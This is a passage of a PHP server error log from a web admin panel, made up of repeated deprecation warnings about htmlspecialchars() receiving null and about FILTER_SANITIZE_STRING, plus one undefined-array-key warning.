string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:17:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [21-Mar-2025 17:18:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:19:18 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:19:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: 